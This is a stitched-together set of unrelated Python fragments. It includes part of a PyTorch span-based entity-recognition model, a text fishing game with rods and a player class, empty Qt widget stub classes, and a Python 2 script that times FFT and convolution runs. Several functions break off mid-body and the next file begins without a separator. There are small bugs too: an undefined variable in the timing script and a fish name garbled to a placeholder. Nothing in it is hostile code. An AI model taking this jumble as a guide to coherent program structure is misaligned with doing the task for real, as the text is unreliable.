for i in range(batch_size):
sent_ents = []
for start, end, label in entity_batch[i]:
if end + 1 - start <= self.C:
sent_ents.append((start, end, label))
ret_l.append(sent_ents)
return ret_l
def _marginize(self, TI_scores, TX_scores, entity_batch):
"""
Add softmax margin
"""
batch_size, sent_len, label_size = TI_scores.size()
FP_mat = torch.zeros(batch_size, sent_len, label_size)
FN_mat = torch.zeros(batch_size, sent_len, label_size)
for b in range(batch_size):
for i in range(sent_len):
for k in range(label_size):
bool_TX = True
for j in range(i, sent_len):
if (i, j, k) in entity_batch[b]:
bool_TX = False
if bool_TX:
FP_mat[b,i,k] = 1
else:
FN_mat[b,i,k] = self.beta
FP_var = Variable(FP_mat)
FN_var = Variable(FN_mat)
if self.config.if_gpu:
FP_var = FP_var.cuda()
FN_var = FN_var.cuda()
TI_scores = TI_scores + FP_var
TX_scores = TX_scores + FN_var
return TI_scores, TX_scores
def forward(self,
inputs: torch.FloatTensor,
entity_batch: List) -> Dict[str, torch.Tensor]:
"""
inputs: matrix with size: batch_size * sent_len * feat_dim
entities: list of (start, end, label)
Output dictionary contains:
expectation: the expected value of partition function in log space
loss: if chunks is given
"""
output = {}
batch_size, sent_len, feat_dim = inputs.size()
if self.config.if_C:
entity_batch = self._filter_entity(inputs, entity_batch)
TX_scores = self.TX_lin(inputs)
TX_batch_mask = self._gen_TX_batch(inputs, entity_batch)
TX_ner_scores = torch.mul(TX_scores, TX_batch_mask).sum(1).sum(1)
ner_scores = TX_ner_scores
span_vectors = self._gen_seg_mat(inputs)
IX_scores = self.IX_lin(span_vectors)
IX_ner_scores = self.score_chunk(IX_scores, entity_batch)
ner_scores = ner_scores + IX_ner_scores
TI_scores = self.TI_lin(inputs)
TI_batch_mask = self._gen_TI_batch(inputs, entity_batch)
TI_ner_scores = torch.mul(TI_scores, TI_batch_mask).sum(1).sum(1)
ner_scores = ner_scores + TI_ner_scores
if sent_len > 1:
II_list = []
for pos in range(sent_len - 1):
II_pos = self.II_lin(torch.cat([inputs[:, pos], inputs[:, pos + 1]], 1)) # batch_size * 1
II_list.append(II_pos)
II_scores = torch.stack(II_list, 1) # batch_size * sent_len - 1 * label_size
II_batch_mask = self._gen_II_batch(inputs, entity_batch)
II_ner_scores = torch.mul(II_scores, II_batch_mask).sum(1).sum(1)
ner_scores = ner_scores + II_ner_scores
else:
II_scores = None
#TODO: TI constrain
if self.if_margin:
TI_scores, TX_scores = self._marginize(TI_scores, TX_scores, entity_batch)
TX_scores = TX_scores.transpose(0, 1).contiguous()
if II_scores is not None:
II_scores = II_scores.transpose(0, 1).contiguous()
if TI_scores is not None:
TI_scores = TI_scores.transpose(0, 1).contiguous()
inside_score = self.inside(IX_scores, TX_scores, II_scores, TI_scores)
assert inside_score.size() == ner_scores.size()
output["expectation"] = inside_score
# negative log-likelihood
loss_vec = (inside_score - ner_scores)
output["loss"] = loss_vec.mean()
# loss could be negative if we restrict the max length
loss_vec_relu = F.relu(loss_vec)
diff = (loss_vec_relu - loss_vec).max().cpu().data[0]
        # if diff > 1e-4:  # around single precision
if output["loss"].cpu().data[0] < 0:
# pdb.set_trace()
output["loss"] = loss_vec_relu.mean()
print("Nega loss! diff {0} with length {1}".format(diff, sent_len))
return output
def inside(self,
IX_scores: torch.FloatTensor,
TX_scores: torch.FloatTensor,
II_scores: torch.FloatTensor,
TI_scores: torch.FloatTensor) -> torch.FloatTensor:
"""
:param
IX_scores: sent_len * sent_len * batch_size * label_size
TX_scores: sent_len * batch_size * label_size
II_scores: sent_len - 1 * batch_size * label_size
:return: Z
"""
sent_len, sent_len, batch_size, label_size = IX_scores.size()
if sent_len == 1:
if TI_scores is None:
return log_sum_exp_b(IX_scores[0,0], TX_scores[0]).sum(1)
else:
return log_sum_exp_b(IX_scores[0,0] + TI_scores[0], TX_scores[0]).sum(1)
score_list = []
for i in range(sent_len):
if self.config.if_C:
outlier = min(i + self.C - 1, sent_len - 1)
else:
outlier = sent_len - 1
pre_vec = IX_scores[i, outlier]
for j in reversed(range(i, outlier)):
# pdb.set_trace()
vec_A = pre_vec + II_scores[j]
vec_B = IX_scores[i, j]
vec_C = vec_A + vec_B
# merged_ = log_sum_exp_t(vec_A, vec_B, vec_C)
merged_v = torch.stack([vec_A, vec_B, vec_C], 2)
merged = (merged_v - F.log_softmax(merged_v, dim=2)).mean(2)
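                # Identity: x_t - log_softmax(x)_t == logsumexp(x) for every t,
                # so the mean over dim 2 equals logsumexp of the stacked scores.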
pre_vec = merged
ent_vec = pre_vec
ent_vec = ent_vec + TI_scores[i]
# final_vec_ = log_sum_exp_b(ent_vec, null_scores[i])
final_vec = torch.stack([ent_vec, TX_scores[i]], 2) # batch_size * label_size * 2
merged_final_vec = (final_vec - F.log_softmax(final_vec, dim=2)).mean(2) # batch_size * label_size
# pdb.set_trace()
score_list.append(merged_final_vec.sum(1)) # batch_size
score_mat = torch.stack(score_list, 1) # batch_size * sent_len
overall_score = score_mat.sum(1)
# overall_score = sum(score_list)
return overall_score
def outside(self,
inputs: torch.FloatTensor) -> torch.FloatTensor:
"""
for sanity check
"""
pass
def score_chunk(self,
IX_scores: torch.FloatTensor,
entity_batch: List) -> torch.Tensor:
sent_len, sent_len, batch_size, label_size = IX_scores.size()
gold_score = []
for i in range(batch_size):
entities = entity_batch[i]
a_score = create_empty_var(self.config.if_gpu)
for start, end, label in entities:
a_score += IX_scores[start, end, i, label]
gold_score.append(a_score)
return torch.cat(gold_score, 0)
def decode(self,
inputs: torch.FloatTensor) -> List:
"""
:param inputs: matrix of embeddings
:return: partial overlapping structure
The main purpose of decoding is not for metrics, but for interpretation
"""
batch_size, sent_len, feat_dim = inputs.size()
II_list = []
for pos in range(sent_len - 1):
II_pos = self.II_lin(torch.cat([inputs[:, pos], inputs[:, pos + 1]], 1)) # batch_size * 1
II_list.append(II_pos)
if len(II_list) != 0:
II_scores = torch.stack(II_list, 0) # sent_len - 1 * batch_size * label_size
IX_vectors = self._gen_seg_mat(inputs) # sent_len * sent_len * batch_size * feat_dim
IX_scores = self.IX_lin(IX_vectors)
TX_scores = self.TX_lin(inputs) # batch_size * sent_len * feat_dim
TI_scores = self.TI_lin(inputs)
ret_list = []
for i in range(batch_size):
entity_list = []
for j in range(sent_len):
for k in range(self.config.label_size):
if self.config.if_C:
outlier = min(j + self.C - 1, sent_len - 1)
else:
outlier = sent_len - 1
def recur_find(s):
if s == outlier:
return IX_scores[j, s, i, k], [s]
best_value, best_ends = recur_find(s+1)
import numpy as np
import random
import time
from libdw import sm
#Defining the class Rod, which encompasses functions that all rods/fish catching equipment have
class Rod:
#n represents the number of fish caught a time by the type of rod, default value is 1
n = 1
#defines an attribute .chance, which is the probability of catching each type of fish, specific to each rod
def __init__(self):
self.chance = [1]*self.stat1 + [2]*self.stat2 + [3]*self.stat3 + [4]*self.stat4
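    # Equivalent draw (sketch, Python 3.6+): random.choices([1, 2, 3, 4],
    # weights=[self.stat1, self.stat2, self.stat3, self.stat4])[0] samples the
    # same distribution without building the padded list.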
#main function called to start fishing in the game, which also calls upon another function catch_fish
def startfishing(self):
n = self.n
timer = random.randint(3,5)
print("\n\tFishing... Patience is key.")
time.sleep(timer)
print("\t!!!!!")
start = time.time()
fishnames, fishlengths = self.catch_fish()
input("\tQuick! Press ENTER to catch the fish!\n")
end = time.time()
duration = round(end-start,1)
#function checks for the time it takes for player to react to the fishing prompt
#if player takes longer than 1.5 seconds to enter an input, the fish is not caught
if duration <= 1.5:
for i in range(n):
print("\n\tWoah! You caught a {}! It's {}cm long.".format(fishnames[i],fishlengths[i]))
user.fishlist += "\n\t" + fishnames[i] + " - " + str(fishlengths[i]) + "cm"
user.fishcount.append(fishlengths[i])
user.fishdict[fishnames[i]] += 1
if fishlengths[i] > user.largest:
user.largest = fishlengths[i]
user.fishdict["Largest Fish You Ever Caught"] = str(user.largest) + " cm"
else:
print("\n\tAww, it escaped.\n")
# def catch_fish(self, self.n=1):
def catch_fish(self):
n = self.n
probability = self.chance
fishnames = []
fishlengths = []
#this function randomly chooses one type of fish to be caught out of the four.
#the length of the type of fish caught is also randomly generated, with a specific range for each type.
for i in range(n):
fish = random.choice(probability)
if fish == 1:
fishname = "Guppy"
fishlength = random.randint(3,6)
elif fish == 2:
fishname = "S<NAME>"
fishlength = random.randint(10,60)
elif fish == 3:
fishname = "King Salmon"
fishlength = random.randint(80,170)
elif fish == 4:
fishname = "Giant Magikarp??"
fishlength = random.randint(200,450)
fishnames.append(fishname)
fishlengths.append(fishlength)
#the steps below add on to the player's fishing history/statistics for every fish he catches
# user.fishdict[fishname] += 1
# if fishlength > user.largest:
# user.largest = fishlength
# user.fishdict["Largest Fish You Ever Caught"] = str(user.largest) + " cm"
return fishnames, fishlengths
#CLASS INHERITANCE of Rod in different types of rods within the game
#Defining stat1, stat2, stat3 and stat4 for each type of rod allows for customisation
#of fishing probability for each rod, with the probability being higher for 'better quality'
#or more expensive fish as the upgrade becomes higher
class OldRod(Rod):
"""
STARTER ROD
probability of getting 1: 50%,
probability of getting 2: 30%,
probability of getting 3: 15%,
probability of getting 4: 5%
"""
stat1 = 50
stat2 = 30
stat3 = 15
stat4 = 5
class NewerRod(Rod):
"""
probability of getting 1: 20%,
probability of getting 2: 40%,
probability of getting 3: 30%,
probability of getting 4: 10%
"""
stat1 = 20
stat2 = 40
stat3 = 30
stat4 = 10
class SuperRod5000(Rod):
"""
OP ROD
probability of getting 1: 10%
probability of getting 2: 15%
probability of getting 3: 30%
probability of getting 4: 45%
"""
stat1 = 10
stat2 = 15
stat3 = 30
stat4 = 45
#This is a special type of rod, the Fishing Net
#the player does not own this rod, instead, it is a single-use purchasable tool/add-on in the game
#here, n has been defined as 5 as the fishing net can catch 5 fishes for each time the user uses it
#the fishing net is also a rod since it uses the same functions catch_fish and start_fishing
class FishingNet(Rod):
"""
catches 5 fish in a row, 1 time usage, probability is buffed
probability of getting 1: 20%
probability of getting 2: 20%
probability of getting 3: 30%
probability of getting 4: 30%
"""
stat1 = 20
stat2 = 20
stat3 = 30
stat4 = 30
n = 5
#Object instantiation for the rods used in the game
#this allows the rod's functions to be callable within the state machine and by the Player object
oldrod = OldRod()
newerrod = NewerRod()
superrod = SuperRod5000()
fishingnet = FishingNet()
#Defining the Player class - this class creates an object called the Player, which encompasses
#common attributes used and accessed by the user in the game
class Player:
name = "John"
#This is the fish dictionary, it keeps track of total no. of each type of fish caught
#by the player throughout the entire game, as well as the longest fish ever caught
fishdict = {
"Guppy" : 0,
"Saba Fish" : 0,
"King Salmon" : 0,
"Giant Magikarp??" : 0,
"Largest Fish You Ever Caught" : ""
}
#rod list is a list of the rods that can be owned/used by the user/player
rodlist = [oldrod, newerrod, superrod]
    #net = "OFF" and netcount = 0 define the default state whereby the player does not own any nets at the start of the game
#therefore the player is not allowed to use any nets
net = "OFF"
netcount = 0
#an arbitrary value set to start storing the largest length of fish caught
largest = 1
#When player starts the game, he has no fishes, $0 and starts with the starter rod, Old Rod.
def __init__(self):
self.fishcount = []
self.fishlist = ""
self.coins = 0
self.rod = self.rodlist[0]
#A function that is called when user wants to check how much money he has
def get_coins(self):
print("\n\tWow, you have ${} right now.\n".format(self.coins))
return self.coins
#The function called when user wants to check how many fishes he has currently
def my_fishes(self):
if self.fishlist == "":
print("\n\tYou don't have any fishes right now.\n")
else:
print(self.fishlist)
#Function called when user wants to sell the fishes he has on him currently
def sell_fishes(self):
#catches the scenario where the user has no fish to sell, returns him back to previous action
if self.fishcount == []:
print("\n\tHey, who are you trying to kid? You haven't fished anything to sell!\n")
return
total_lengths = sum(self.fishcount)
#profit = total length of fishes he has caught (in cm) x Market rate for fishes ($0.50 per cm)
profit = total_lengths * 0.50
self.coins += profit
#fishcount and fishlist is reset everytime he makes a sale
self.fishcount = []
self.fishlist = ""
print("""
What a sale! You've earned ${}!
You now have ${} in total.
Keep working hard :)
""".format(profit,self.coins))
#Function called when user wants to purchase some single-use fishing nets to use in game
def buy_nets(self):
print("""
So you want to buy some fishing nets? Sure!
Let me explain how to use them again:
Each fishing net catches you five fishes at one time, and can only be used once, with:
probability of getting Guppy: {0}%,
probability of getting Saba Fish: {1}%,
        probability of getting King Salmon: {2}%,
probability of getting Giant Magikarp??: {3}%
After purchasing fishing nets, the option to enter 'N' will appear when you are FISHING.
Enter 'N' each time to use the fishing net(s) you have purchased.
Once all fishing nets purchased have been used up, you will no longer be given the option 'N'.
Price of 1 fishing net: $20
How many would you like to buy?
Enter "None" if you'd like to cancel your purchase.
""".format(fishingnet.stat1,fishingnet.stat2,fishingnet.stat3,fishingnet.stat4))
ans = input(">>>")
#This allows for the user to go back to his previous action if he changes his mind
#and doesn't want to buy a net anymore
if ans == "None":
return
#this catches the error whereby the string input by the user is not an integer and cannot be converted to integer type,
#hence preventing an error that crashes the game
try:
int(ans)
except:
print("\n\tThat's an invalid number! Please try again :)\n")
self.buy_nets()
else:
#checks amount of money user has
balance = self.coins
ans = int(ans)
#check if his amount of money is sufficient
if balance >= ans*20:
self.net = "ON"
self.coins = self.coins - ans*20
self.netcount += ans
print("""
Thank you for your payment!
You have purchased {0} fishing nets.
Your current coin balance is: ${1}.
""".format(int(ans),self.coins))
#else, the transaction does not go through and user is sent back to previous action
else:
print("""
Oh no! You don't have enough money.
Your current coin balance is: ${}.
        Please purchase fewer nets OR come back when you have more :)
""".format(self.coins))
return
#Function called when player would like to upgrade his current fishing rod
def upgrade_rod(self):
"""
PRICELIST:
NEWER ROD: requires $100
SUPER ROD 5000: requires $1000
"""
namelist = ["Newer Rod","SUPER ROD 5000"]
pricelist = [100,1000]
index = self.rodlist.index(self.rod)
#Catches the scenario where the player has upgraded to the best rod and it cannot be upgraded further
if index == 2:
print("\n\tSorry! You've reached your maximum upgrade :)\n")
return
balance = self.coins
print("""
Yay! Time to upgrade your rod!
Your next available rod is: {0}!
probability of getting Guppy: {1}%,
probability of getting Saba Fish: {2}%,
        probability of getting King Salmon: {3}%,
probability of getting Giant Magikarp??: {4}%
COST: ${5}
        Your current rod's specifications:
probability of getting Guppy: {6}%,
probability of getting Saba Fish: {7}%,
        probability of getting King Salmon: {8}%,
probability of getting Giant Magikarp??: {9}%
Would you like to upgrade? Y/N
""".format(namelist[index],self.rodlist[index+1].stat1,self.rodlist[index+1].stat2,self.rodlist[index+1].stat3,self.rodlist[index+1].stat4,pricelist[index],self.rodlist[index].stat1,self.rodlist[index].stat2,self.rodlist[index].stat3,self.rodlist[index].stat4))
#Player decides whether or not to upgrade
key = input(">>>")
if key == "Y":
#checks if player has enough money to upgrade his rod
if balance >= pricelist[index]:
                self.rod = self.rodlist[index + 1]
def visibleRegion(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def wheelEvent(*args, **kwargs):
pass
def width(*args, **kwargs):
pass
def window(*args, **kwargs):
pass
def windowFilePath(*args, **kwargs):
pass
def windowFlags(*args, **kwargs):
pass
def windowHandle(*args, **kwargs):
pass
def windowIcon(*args, **kwargs):
pass
def windowIconText(*args, **kwargs):
pass
def windowModality(*args, **kwargs):
pass
def windowOpacity(*args, **kwargs):
pass
def windowRole(*args, **kwargs):
pass
def windowState(*args, **kwargs):
pass
def windowTitle(*args, **kwargs):
pass
def windowType(*args, **kwargs):
pass
def x(*args, **kwargs):
pass
def y(*args, **kwargs):
pass
def createWindowContainer(*args, **kwargs):
pass
def instanceCounter(*args, **kwargs):
pass
def instanceOperationsCounter(*args, **kwargs):
pass
def keyboardGrabber(*args, **kwargs):
pass
def mouseGrabber(*args, **kwargs):
pass
def setTabOrder(*args, **kwargs):
pass
DrawChildren = None
DrawWindowBackground = None
IgnoreMask = None
RenderFlag = None
RenderFlags = None
__new__ = None
customContextMenuRequested = None
staticMetaObject = None
windowIconChanged = None
windowIconTextChanged = None
windowTitleChanged = None
class QListWidgetItem(_Object):
def __eq__(*args, **kwargs):
"""
x.__eq__(y) <==> x==y
"""
pass
def __ge__(*args, **kwargs):
"""
x.__ge__(y) <==> x>=y
"""
pass
def __gt__(*args, **kwargs):
"""
x.__gt__(y) <==> x>y
"""
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __le__(*args, **kwargs):
"""
x.__le__(y) <==> x<=y
"""
pass
def __lshift__(*args, **kwargs):
"""
x.__lshift__(y) <==> x<<y
"""
pass
def __lt__(*args, **kwargs):
"""
x.__lt__(y) <==> x<y
"""
pass
def __ne__(*args, **kwargs):
"""
x.__ne__(y) <==> x!=y
"""
pass
def __rlshift__(*args, **kwargs):
"""
x.__rlshift__(y) <==> y<<x
"""
pass
def __rrshift__(*args, **kwargs):
"""
x.__rrshift__(y) <==> y>>x
"""
pass
def __rshift__(*args, **kwargs):
"""
x.__rshift__(y) <==> x>>y
"""
pass
def background(*args, **kwargs):
pass
def backgroundColor(*args, **kwargs):
pass
def checkState(*args, **kwargs):
pass
def clone(*args, **kwargs):
pass
def data(*args, **kwargs):
pass
def flags(*args, **kwargs):
pass
def font(*args, **kwargs):
pass
def foreground(*args, **kwargs):
pass
def icon(*args, **kwargs):
pass
def isHidden(*args, **kwargs):
pass
def isSelected(*args, **kwargs):
pass
def listWidget(*args, **kwargs):
pass
def read(*args, **kwargs):
pass
def setBackground(*args, **kwargs):
pass
def setBackgroundColor(*args, **kwargs):
pass
def setCheckState(*args, **kwargs):
pass
def setData(*args, **kwargs):
pass
def setFlags(*args, **kwargs):
pass
def setFont(*args, **kwargs):
pass
def setForeground(*args, **kwargs):
pass
def setHidden(*args, **kwargs):
pass
def setIcon(*args, **kwargs):
pass
def setSelected(*args, **kwargs):
pass
def setSizeHint(*args, **kwargs):
pass
def setStatusTip(*args, **kwargs):
pass
def setText(*args, **kwargs):
pass
def setTextAlignment(*args, **kwargs):
pass
def setTextColor(*args, **kwargs):
pass
def setToolTip(*args, **kwargs):
pass
def setWhatsThis(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def statusTip(*args, **kwargs):
pass
def text(*args, **kwargs):
pass
def textAlignment(*args, **kwargs):
pass
def textColor(*args, **kwargs):
pass
def toolTip(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def write(*args, **kwargs):
pass
ItemType = None
Type = None
UserType = None
__new__ = None
class QStyleFactory(_Object):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def create(*args, **kwargs):
pass
def keys(*args, **kwargs):
pass
__new__ = None
class QStylePainter(_QPainter):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def begin(*args, **kwargs):
pass
def drawComplexControl(*args, **kwargs):
pass
def drawControl(*args, **kwargs):
pass
def drawItemPixmap(*args, **kwargs):
pass
def drawItemText(*args, **kwargs):
pass
def drawPrimitive(*args, **kwargs):
pass
def style(*args, **kwargs):
pass
__new__ = None
class QButtonGroup(_QObject):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addButton(*args, **kwargs):
pass
def button(*args, **kwargs):
pass
def buttons(*args, **kwargs):
pass
def checkedButton(*args, **kwargs):
pass
def checkedId(*args, **kwargs):
pass
def exclusive(*args, **kwargs):
pass
def id(*args, **kwargs):
pass
def removeButton(*args, **kwargs):
pass
def setExclusive(*args, **kwargs):
pass
def setId(*args, **kwargs):
pass
__new__ = None
buttonClicked = None
buttonPressed = None
buttonReleased = None
buttonToggled = None
staticMetaObject = None
class QGraphicsAnchor(_QObject):
def setSizePolicy(*args, **kwargs):
pass
def setSpacing(*args, **kwargs):
pass
def sizePolicy(*args, **kwargs):
pass
def spacing(*args, **kwargs):
pass
def unsetSpacing(*args, **kwargs):
pass
staticMetaObject = None
class QTableWidgetItem(_Object):
def __eq__(*args, **kwargs):
"""
x.__eq__(y) <==> x==y
"""
pass
def __ge__(*args, **kwargs):
"""
x.__ge__(y) <==> x>=y
"""
pass
def __gt__(*args, **kwargs):
"""
x.__gt__(y) <==> x>y
"""
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __le__(*args, **kwargs):
"""
x.__le__(y) <==> x<=y
"""
pass
def __lshift__(*args, **kwargs):
"""
x.__lshift__(y) <==> x<<y
"""
pass
def __lt__(*args, **kwargs):
"""
x.__lt__(y) <==> x<y
"""
pass
def __ne__(*args, **kwargs):
"""
x.__ne__(y) <==> x!=y
"""
pass
def __rlshift__(*args, **kwargs):
"""
x.__rlshift__(y) <==> y<<x
"""
pass
def __rrshift__(*args, **kwargs):
"""
x.__rrshift__(y) <==> y>>x
"""
pass
def __rshift__(*args, **kwargs):
"""
x.__rshift__(y) <==> x>>y
"""
pass
def background(*args, **kwargs):
pass
def backgroundColor(*args, **kwargs):
pass
def checkState(*args, **kwargs):
pass
def clone(*args, **kwargs):
pass
def column(*args, **kwargs):
pass
def data(*args, **kwargs):
pass
def flags(*args, **kwargs):
pass
def font(*args, **kwargs):
pass
def foreground(*args, **kwargs):
pass
def icon(*args, **kwargs):
pass
def isSelected(*args, **kwargs):
pass
def read(*args, **kwargs):
pass
def row(*args, **kwargs):
pass
def setBackground(*args, **kwargs):
pass
def setBackgroundColor(*args, **kwargs):
pass
def setCheckState(*args, **kwargs):
pass
def setData(*args, **kwargs):
pass
def setFlags(*args, **kwargs):
pass
def setFont(*args, **kwargs):
pass
def setForeground(*args, **kwargs):
pass
def setIcon(*args, **kwargs):
pass
def setSelected(*args, **kwargs):
pass
def setSizeHint(*args, **kwargs):
pass
def setStatusTip(*args, **kwargs):
pass
def setText(*args, **kwargs):
pass
def setTextAlignment(*args, **kwargs):
pass
def setTextColor(*args, **kwargs):
pass
def setToolTip(*args, **kwargs):
pass
def setWhatsThis(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def statusTip(*args, **kwargs):
pass
def tableWidget(*args, **kwargs):
pass
def text(*args, **kwargs):
pass
def textAlignment(*args, **kwargs):
pass
def textColor(*args, **kwargs):
pass
def toolTip(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
def whatsThis(*args, **kwargs):
pass
def write(*args, **kwargs):
pass
ItemType = None
Type = None
UserType = None
__new__ = None
class QMouseEventTransition(_QtCore.QEventTransition):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def button(*args, **kwargs):
pass
def eventTest(*args, **kwargs):
pass
def hitTestPath(*args, **kwargs):
pass
def modifierMask(*args, **kwargs):
pass
def onTransition(*args, **kwargs):
pass
def setButton(*args, **kwargs):
pass
def setHitTestPath(*args, **kwargs):
pass
def setModifierMask(*args, **kwargs):
pass
__new__ = None
    staticMetaObject = None
#!/usr/bin/python
# a timing script for FFTs and convolutions using OpenMP
import sys, getopt
import numpy as np
from math import *
from subprocess import * # for popen, running processes
import os
import re # regexp package
import shutil
def mvals_from_file(filename):
mvals = []
if os.path.isfile(filename):
with open(filename, 'r') as fin:
for line in fin:
if not line.startswith("#"):
mvals.append(int(line.split()[0]))
return mvals
def max_m(p, RAM, runtype):
print "program:", p
print "runtype:", runtype
print "ram:", RAM
b = 0
if "transpose" in p:
# NB: assumes Z=1 and out-of-place
return int(floor(log(RAM / 32) / log(2) / 2))
if "cconv2" in p:
if runtype == "implicit":
# A * 2m^2 * 16
return int(floor(log(RAM / 64) / ( 2 * log(2)) ))
else:
# A * 4m^2 * 16
return int(floor(log(RAM / 128) / (2 * log(2)) ))
if "cconv3" in p:
if runtype == "implicit":
# A * 2m^3 * 16
return int(floor( log(RAM / 64) / (3 * log(2)) ))
else:
# A * 8m^3 * 16
return int(floor( log(RAM / 256) / (3 * log(2)) ))
if "cconv" in p:
b = int(floor(log(RAM / 4) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "tconv2" in p:
if runtype == "implicit":
# A * 6m^2 * 16
return int(floor( log(RAM / 192) / (2 * log(2)) ))
else:
# A * 12m^2 * 16
return int(floor( log(RAM / 768) / (2 * log(2)) ))
if "tconv" in p:
b = int(floor(log(RAM / 6) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "conv2" in p:
if runtype == "implicit":
# A * 3 m^2 * 16
return int(floor(log(RAM / 96) / (2 * log(2)) ))
else:
# A * 4.5 m^2 * 16
return int(floor(log(RAM / 144) / (2 * log(2)) ))
if "conv3" in p:
# A * 6 m^3 * 16
return int(floor(log(RAM / 192) / (3 * log(2)) ))
if "conv" in p:
b = int(floor(log(RAM / 6) / log(2)))
b = min(b, 20) # because we aren't crazy
return b
if "mft1" in p:
return int(floor(0.5 * log(RAM / 64) / log(2)))
if "fft1" in p:
return int(floor(0.5 * log(RAM / 64) / log(2)))
if p == "fft2":
return int(floor(log(RAM / 32) / log(2) / 2))
if p == "fft2r":
return int(floor(log(RAM / 32) / log(2) / 2))
if p == "fft3":
return int(floor(log(RAM / 32) / log(2) / 3))
if p == "fft3r":
return int(floor(log(RAM / 32) / log(2) / 3))
if p == "transpose":
return int(floor(log(RAM / 32) / log(2) / 2))
print "Error! Failed to determine b."
return 0
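# Worked example (sketch): cconv2 with runtype "implicit" and 8 GiB of RAM:
# RAM = 8 * 2**30 = 2**33, so floor(log(2**33 / 64) / (2 * log(2)))
# = floor(27 / 2) = 13, i.e. problem sizes up to m = 2**13.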
def default_outdir(p):
outdir=""
if p == "cconv":
outdir = "timings1c"
if p == "cconv2":
outdir = "timings2c"
if p == "cconv3":
outdir = "timings3c"
if p == "conv":
outdir = "timings1r"
if p == "conv2":
outdir = "timings2r"
if p == "conv3":
outdir = "timings3r"
if p == "tconv":
outdir = "timings1t"
if p == "tconv2":
outdir="timings2t"
if p == "fft1":
outdir = "timingsf1"
if p == "mfft1":
outdir = "timingsmf1"
if p == "fft2":
outdir = "timingsf2"
if p == "transpose":
outdir="transpose2"
return outdir
def main(argv):
usage = '''Usage:
\ntimings.py
-a<start>
-b<stop>
-p<cconv,cconv2,cconv3,conv,conv2,conv3,tconv,tconv2>
-T<number of threads>
-A<quoted arg list for timed program>
-B<pre-commands (eg srun)>
-r<implicit/explicit/pruned/fft>
-R<ram in gigabytes>
-d dry run
-o<output file name>
-D<outdir>
-o<outfile>
-P<path to executable>
-g<grep string>
-N<int> Number of tests to perform
    -e<0 or 1>: append to the existing timing data (skipping
    already-done problem sizes).
-c<string>: extra commentary for output file.
-v: verbose output
'''
dryrun = False
#dryrun = True
bset = 0
dorun = True
T = 0 # number of threads
p = "" # program name
B = [] # precommands
A = [] # postcommands
E = [] # environment variables (eg: -EGOMP_CPU_AFFINITY -E"0 1 2 3")
a = 6 # minimum log of problem size
b = 0 # maximum log of problem size
runtype = "implicit" # type of run
RAM = 0 # ram limit in GB
outdir = "" # output directory
outfile = "" # output filename
rname = "" # output grep string
N = 0 # number of tests
appendtofile = False
stats = 0
path = "./"
verbose = False
extracomment = ""
try:
opts, args = getopt.getopt(argv,"hdp:T:a:b:c:A:B:E:e:r:R:S:o:P:D:g:N:v")
except getopt.GetoptError:
print "error in parsing arguments."
print usage
sys.exit(2)
for opt, arg in opts:
if opt in ("-p"):
p = arg
if opt in ("-T"):
T = arg
elif opt in ("-a"):
a = int(arg)
elif opt in ("-N"):
N = int(arg)
elif opt in ("-b"):
b = int(arg)
elif opt in ("-c"):
extracomment = arg
elif opt in ("-A"):
A += [str(arg)]
elif opt in ("-B"):
B += [str(arg)]
elif opt in ("-E"):
E += [str(arg)]
elif opt in ("-e"):
appendtofile = (int(arg) == 1)
elif opt in ("-r"):
runtype = str(arg)
elif opt in ("-R"):
print "ram arg:", arg
RAM = float(arg)*2**30
elif opt in ("-S"):
stats = int(arg)
elif opt in ("-d"):
dryrun = True
elif opt in ("-o"):
outfile = str(arg)
elif opt in ("-P"):
path = arg
elif opt in ("-D"):
outdir = str(arg)
elif opt in ("-g"):
rname = str(arg)
elif opt in ("-v"):
verbose = True
elif opt in ("-h"):
print usage
sys.exit(0)
if dryrun:
print "Dry run! No output actually created."
if p == "":
print "please specify a program with -p"
print usage
sys.exit(2)
print "RAM:", RAM
# if both the max problem size and the ram are unset, go up to 2^8
if (b == 0 and RAM == 0):
b = 8
hermitian = False
ternary = False
if p == "cconv":
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "conv":
hermitian = True
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "conv2":
hermitian = True
if p == "conv3":
hermitian = True
if(runtype != "implicit"):
print p + " has no " + r + " option"
dorun = False
if p == "tconv":
ternary = True
if(runtype == "pruned"):
print p + " has no pruned option"
dorun = False
if p == "tconv2":
ternary = True
if p == "fft1":
runtype = "fft"
if p == "mfft1":
runtype = "fft"
if p == "fft2":
runtype = "fft"
if p == "transpose":
runtype = "transpose"
if outdir == "":
outdir = default_outdir(p)
if outdir == "":
print "empty outdir: please select a program or specify an outdir (-D)"
print
print usage
sys.exit(2)
if RAM != 0:
b = max_m(p, RAM, runtype)
print "max value of b with ram provided:", b
if outfile == "":
outfile = "implicit"
goodruns = []
badruns = []
if dorun:
if RAM != 0:
print "max problem size is "+str(2**b)
if rname == "":
if runtype == "implicit":
rname = "Implicit"
if runtype == "explicit":
rname = "Explicit"
if runtype == "pruned":
rname = "rune"
if runtype == "fft":
rname = "fft"
if runtype == "transpose":
rname = "transpose"
print "Search string for timing: " + rname
filename = outdir + "/" + outfile
print "output in", filename
mdone = mvals_from_file(filename)
print "problem sizes already done:", mdone
print "environment variables:", E
if not dryrun:
os.system("mkdir -p " + outdir)
with open(outdir + "/log", "a") as logfile:
logfile.write(str(sys.argv))
logfile.write("\n")
logfile.write("intial exponent: " + str(a) + "\n")
logfile.write("final exponent: " + str(b) + "\n")
if not appendtofile:
os.system("rm -f " + filename)
cmd = []
i = 0
while i < len(B):
cmd.append(B[i]);
i += 1
cmd += [path + str(p)]
